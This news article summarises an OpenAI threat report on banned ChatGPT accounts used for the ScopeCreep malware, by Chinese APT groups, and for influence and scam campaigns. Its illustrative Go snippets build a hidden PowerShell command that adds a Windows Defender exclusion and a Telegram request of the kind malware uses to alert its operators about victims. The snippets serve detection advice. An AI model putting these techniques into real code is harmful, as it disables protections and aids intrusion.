OpenAI has revealed that it has banned a set of ChatGPT accounts likely operated by Russian-speaking threat actors and two Chinese nation-state hacking groups, who used the accounts to assist with malware development, social media automation, and research into US satellite communications technology.
“The [Russian-speaking] actor used our models to help develop and refine Windows malware, debugging code in multiple languages and setting up their command-and-control infrastructure,” OpenAI said in its threat intelligence report. “The actor demonstrated knowledge of Windows internals and exhibited some operational security behaviors.”
The Go-based malware campaign has been codenamed ScopeCreep by the artificial intelligence (AI) company. There is no evidence that the activity was widespread.
According to OpenAI, the threat actor signed up for ChatGPT using temporary email addresses, using each newly created account for a single conversation to make one incremental improvement to the malicious software before abandoning it and moving on to the next.
This practice of refining the code across a network of throwaway accounts underscores the adversary’s focus on operational security (OPSEC), OpenAI added.
The attackers then distributed the AI-assisted malware through a publicly available code repository that impersonated a legitimate video game crosshair overlay tool called Crosshair X.
“From there, the malware was designed to initiate a multi-stage process to escalate privileges, establish stealthy persistence, notify the threat actor, and exfiltrate sensitive data while evading detection,” OpenAI said.
“The malware is designed to escalate privileges by relaunching itself with ShellExecuteW, and attempts to evade detection by programmatically excluding itself from Windows Defender using PowerShell, suppressing console windows, and injecting timing delays.”
Other tactics built into ScopeCreep include the use of Base64 encoding to obfuscate payloads, DLL side-loading techniques, and SOCKS5 proxies to conceal the source IP addresses.
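The Base64 obfuscation mentioned above is worth illustrating because it is trivially reversible: it hides strings from naive signature matching but offers no actual secrecy. The sketch below (with a hypothetical payload string, not anything from the actual malware) shows why analysts can recover such strings instantly.

```go
package main

import (
	"encoding/base64"
	"fmt"
)

// obfuscate Base64-encodes a payload string, mirroring the kind of simple
// encoding the report attributes to ScopeCreep for evading static string scans.
func obfuscate(payload string) string {
	return base64.StdEncoding.EncodeToString([]byte(payload))
}

// deobfuscate reverses the encoding. The takeaway for defenders is that
// Base64 is an evasion of naive matching, not encryption.
func deobfuscate(encoded string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	return string(raw), err
}

func main() {
	enc := obfuscate("calc.exe") // hypothetical string, for illustration only
	fmt.Println(enc)
	dec, _ := deobfuscate(enc)
	fmt.Println(dec)
}
```

Because the transformation is fixed and keyless, detection rules can simply Base64-decode candidate strings before matching.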
The malware’s ultimate goal is to harvest credentials, tokens, and cookies stored in web browsers and exfiltrate them to the attacker. It can also alert a Telegram channel operated by the threat actors when new victims are compromised.
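The Telegram alerting described above typically relies on the public Telegram Bot API. As a minimal sketch, assuming the standard `sendMessage` endpoint with placeholder token and chat ID (nothing here is taken from the actual malware), this is the shape of the request such a check-in would compose; the code only builds the request and never sends anything.

```go
package main

import (
	"fmt"
	"net/url"
)

// buildAlertRequest composes a Telegram Bot API sendMessage call of the
// kind the report describes: malware pinging an attacker-run channel when
// a new victim checks in. Token and chat ID are placeholders.
func buildAlertRequest(botToken, chatID, text string) (endpoint string, form url.Values) {
	endpoint = fmt.Sprintf("https://api.telegram.org/bot%s/sendMessage", botToken)
	form = url.Values{}
	form.Set("chat_id", chatID)
	form.Set("text", text)
	return endpoint, form
}

func main() {
	ep, form := buildAlertRequest("<TOKEN>", "<CHAT_ID>", "new host online")
	fmt.Println(ep) // request is constructed for illustration, not sent
	fmt.Println(form.Encode())
}
```

For defenders, outbound POSTs to `api.telegram.org/bot…/sendMessage` from unexpected processes are a useful network-level indicator of this pattern.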
OpenAI noted that the threat actors asked its models to debug Go code snippets related to HTTPS requests, and sought help with using PowerShell commands via Go to modify Windows Defender settings, particularly when it came to adding antivirus exclusions.
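To make the Defender-tampering behavior concrete, the sketch below shows how a Go program might compose a `powershell.exe` invocation of the documented `Add-MpPreference` cmdlet. This is an illustration of the publicly documented command, not code from ScopeCreep; the command is only constructed here (running it would require Windows and administrator rights), and a hidden-window PowerShell child process of this kind is exactly what endpoint detection rules should flag.

```go
package main

import (
	"fmt"
	"strings"
)

// defenderExclusionArgs builds the powershell.exe argument list for the
// Add-MpPreference antivirus exclusion the report describes. The directory
// is a placeholder. Launching such a child process (often done via
// ShellExecuteW with the "runas" verb to elevate) is a strong detection signal.
func defenderExclusionArgs(dir string) []string {
	return []string{
		"powershell.exe",
		"-WindowStyle", "Hidden", // suppressed console window, per the report
		"-Command",
		fmt.Sprintf("Add-MpPreference -ExclusionPath '%s'", dir),
	}
}

func main() {
	args := defenderExclusionArgs(`C:\Users\Public\app`) // hypothetical path
	fmt.Println(strings.Join(args, " "))                 // composed, never executed
}
```

Monitoring for `Add-MpPreference -ExclusionPath` in process command lines is a common and cheap hunting query for this technique.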
The second set of ChatGPT accounts disabled by OpenAI is said to be linked to two hacking groups attributed to China: APT5 (aka Bronze Fleetwood, Keyhole Panda, Manganese, and UNC2630) and APT15 (aka Flea, Nylon Typhoon, Playful Taurus, Royal APT, and Vixen Panda).
One subset of the accounts was used to modify scripts and troubleshoot system configurations, as well as to conduct open-source research into various entities and technical topics of interest.
“Another subset of the threat actors appeared to be engaged in development support activities such as Linux system administration, software development, and infrastructure setup,” OpenAI said. “For these activities, the threat actors used the models to conduct research into configuration troubleshooting, software modification, and implementation details.”
This included asking about software packages for offline deployment and seeking advice on configuring firewalls and name servers. The threat actors also engaged in both web and Android app development activities.
Additionally, the China-linked clusters worked on brute-force scripts that could break into FTP servers, researched ways to automate penetration testing using large language models (LLMs), and managed fleets of Android devices to programmatically post and engage with content on Facebook, Instagram, TikTok, and X.
Some of the other observed clusters of malicious activity that used ChatGPT for nefarious purposes are listed below:
- A network consistent with the North Korean IT worker scheme that used OpenAI’s models to drive deceptive employment campaigns, developing materials that could advance fraudulent applications for IT, software engineering, and other remote jobs around the world.
- Sneer Review – A China-origin activity that likely used OpenAI’s models to generate large volumes of social media posts in English, Chinese, and Urdu on topics of geopolitical relevance to the country, for sharing on Facebook, Reddit, TikTok, and X.
- Operation High Five – A Philippines-origin activity that used OpenAI’s models to generate content in English and Taglish on topics related to Philippine politics and current events, for sharing on Facebook and TikTok.
- VAGue Focus – A China-origin activity that used OpenAI’s models to generate social media posts for sharing on X while posing as journalists and geopolitical analysts, to ask questions about computer network attack and exploitation tools, and to translate emails and messages from Chinese to English as part of a suspected social engineering attempt.
- Helgoland Bite – A Russia-origin activity that used OpenAI’s models to generate Russian-language content about the German 2025 elections, including criticism of the U.S. and NATO, for sharing on Telegram and X.
- Uncle Spam – A China-origin activity that used OpenAI’s models to generate polarized social media content supporting both sides of divisive topics within U.S. political discourse, for sharing on Bluesky and X.
- Storm-2035 – An activity that used OpenAI’s models to generate short comments in English and Spanish expressing support for Latino rights, Scottish independence, Irish unification, and Palestinian rights, and praising Iran’s military and diplomatic prowess, shared by accounts claiming to be residents of the U.S., Britain, Ireland, and Venezuela.
- Wrong Number – A Cambodia-origin activity, likely linked to Chinese-run task scams, that used OpenAI’s models to generate short recruitment-style messages in English, Spanish, Swahili, Kinyarwanda, German, and Haitian Creole.
“Some of these schemes operated by charging new recruits a substantial participation fee, then using some of those funds to pay existing ’employees’ just enough to keep them engaged,” said OpenAI researchers Ben Nimmo, Albert Zhang, Sophia Farquhar, Max Murphy, and Kimo Bumanglag. “This structure is a hallmark of task scams.”